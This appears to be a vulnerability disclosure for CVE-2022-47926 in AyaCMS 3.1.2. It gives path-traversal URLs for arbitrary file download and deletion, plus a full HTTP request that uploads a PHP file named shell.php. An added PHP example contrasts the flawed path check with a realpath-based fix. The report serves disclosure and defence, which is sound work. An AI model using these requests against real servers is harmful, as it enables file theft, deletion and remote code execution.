CVE-2022-47926: AyaCMS v3.1.2 has Arbitrary file operations Vulnerability · Issue #7 · loadream/AyaCMS
AyaCMS 3.1.2 is vulnerable to file deletion via /aya/module/admin/fst_del.inc.php
Vulnerable files: /aya/module/admin/fst_down.inc.php, /aya/module/admin/fst_del.inc.php
Vulnerability description: The check_path function filters the $file parameter incorrectly. Starting the parameter with characters other than “./\”, such as aya, is enough to bypass the check and download or delete any file on the system.
1. Arbitrary file download vulnerability
You can access any file on the system through:
admin.php?action=fst_down&file=aya/table/…/…/…/…/…/…/windows/win.ini
2. Arbitrary file delete vulnerability
First I create a file named 111.txt under C:\Windows.
Then the file can be deleted through:
admin.php?action=fst_del&file=aya/…/…/…/…/…/windows/111.txt&in_ajax=1
3. Arbitrary file upload vulnerability
POST /upload/admin.php?action=fst_upload&file=aya HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 204
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9HCWsLRL4AuZwHyu
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary9HCWsLRL4AuZwHyu
Content-Disposition: form-data; name="upfile"; filename="shell.php"
Content-Type: text/plain

<?php phpinfo(); ?>
------WebKitFormBoundary9HCWsLRL4AuZwHyu--
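The check_path weakness in the vulnerability description, set beside a containment check that resolves the path before deciding. This is an added example, not AyaCMS code: weak_check_path is an assumed model of the behaviour the report describes, and safe_resolve, the sandbox directory and the file names are hypothetical.

```php
<?php
// Added illustration; not AyaCMS source. All function names are hypothetical.

// Weak pattern modelling the behaviour the report describes (assumed logic):
// only the first character of the value is inspected.
function weak_check_path(string $file): bool
{
    return $file !== '' && strpbrk($file[0], './\\') === false;
}

// Hardened check: resolve the path, then require it to stay under $baseDir.
// Returns the canonical path, or null if the request must be refused.
function safe_resolve(string $baseDir, string $file): ?string
{
    if ($file === '' || strpos($file, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    // realpath() collapses "..", resolves symlinks, and fails on missing files.
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // Compare with a trailing separator so /srv/files2 does not match /srv/files.
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed sandbox: a base directory plus a sibling file outside it.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'aya_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/files/table', 0700, true);
file_put_contents($root . '/files/table/ok.txt', 'inside');
file_put_contents($root . '/secret.txt', 'outside');

// Constructed inputs: one legitimate name and two that leave the base directory.
foreach (['table/ok.txt', 'table/../../secret.txt', '../secret.txt'] as $input) {
    printf("%-24s weak=%-5s hardened=%s\n",
        $input,
        weak_check_path($input) ? 'pass' : 'block',
        safe_resolve($root . '/files', $input) === null ? 'block' : 'allow');
}
```

realpath() fails for files that do not exist yet, so for an upload target resolve the destination directory this way and validate the file name separately.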